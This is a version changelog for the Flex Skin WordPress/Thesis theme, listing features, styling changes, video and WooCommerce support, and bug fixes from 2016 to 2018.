Flex Skin Changelog Version 1.4.1 (Released February 21, 2018) - Hotfix to restore icon font Version 1.4 (Released February 21, 2018) - Added Woocommerce template and design support - Added password - Updated styling for Latest Posts area on Front Page template - Updated CSS for Thesis 2.4+ data-handling changes Version 1.3.1 (Released April 19, 2017) - New Display Option to disable the prepended “Viewing:” found on archive pages. - Fixed an issue with Front Page Featured Header changing all header overlays. #video-player Background Color has been set to Black (noticeable when setting the header to fixed width). - Latest post title is now properly wrapped and its width no longer spans the full width of the page on desktop. Version 1.3 (Released March 20, 2017) - Added Video support to the Front Page Template - Added specific Design options for the Call to Action area - Redesigned the Front Page Template Latest Posts area - Removed the Static Front Page Introduction Section in favor of the WordPress Post editor - Added missing hooks to certain HTML containers /languages folder and .po file for translations - Fixed an issue with encoded special characters breaking some sites with certain character sets - Replaced special characters with HTML entity tags - Removed the Flex option to enable Desktop menu in favor of always showing the desktop menu on desktops (previously you could have a mobile menu display on desktops) Version 1.2 (Released June 27, 2016) - Fixed an issue with Copyright being out of alignment when a start year is selected. - Fixed an issue with some sub menu items being inaccessible when a mene has more than 2 tiers. - Added an “always open” option to comments. (see Skin display options under comments) - Added a border to the top of bylines on single posts. - Added correct desktop spacing to pagination. - Added an option to customize post image borders. (see Skin design options, Layout Settings, Fine-tune Fonts, and More and select Post Images) - Added a filter to remove the comment bubble on the home/archive and single posts when comments are disabled for that post. - Added an option to make no sidebars full width. (see Skin display options > Pages) - Added Sidebar Widget RSS styling. - Suppressed border top for home page when not using a static front page. Version 1.1.12 (Released June 15, 2016) - Added an option to set No-Sidebar templates to full width content. (See Skin Content Display options > Misc). - Added the missing placeholder images for Flex Videos embedded in posts/pages. Version 1.1 (Released June 10, 2016) - Video Support added to the Featured Image for single posts and pages including custom templates (No Sidebar (Post), No Sidebar (Page) and Landing). - Video Embed button added to TinyMCE Toolbar for adding Flex Videos which are optimized for performance. - Call to Action can now be moved to the top or bottom via options. - Call to Action post meta option now has an option to suppress on individual posts/pages. - Option to change the copyright symbol to creative commons in the Copyright & Attribution box. - Optional desktop menu added. - Display options now has button style options. - Display options added to customize notes, tips and alerts. - LinkedIn added to the Social Follow Links. - Option to limited the Front Page Header Image to the same width as your (Content + Sidebar) added. - Display options added to Social Follow Links which allows you to display the social follow links in the Footer and/or Sidebar. - No Sidebar Templates now split into two template. One for Pages and One for Posts. - Footer Social Links renamed to Social Follow Links. - Flex Class system introduced. - Header and Footer modified to take advantage of the new Flex Class system. - Header and Footer elements are always vertically centered now. - Logo 70px height restriction lifted. - Editor Content Block titles are no longer Bold. - No Sidebar Templates no longer center content. - Added a thin shadow around post images. - Fix: Editor Content Block no longer break when a title is not included. Previously it would have reverted the Block to the default style of a note. - Fix: Comments now display only approved comments.
OPCFW_CODE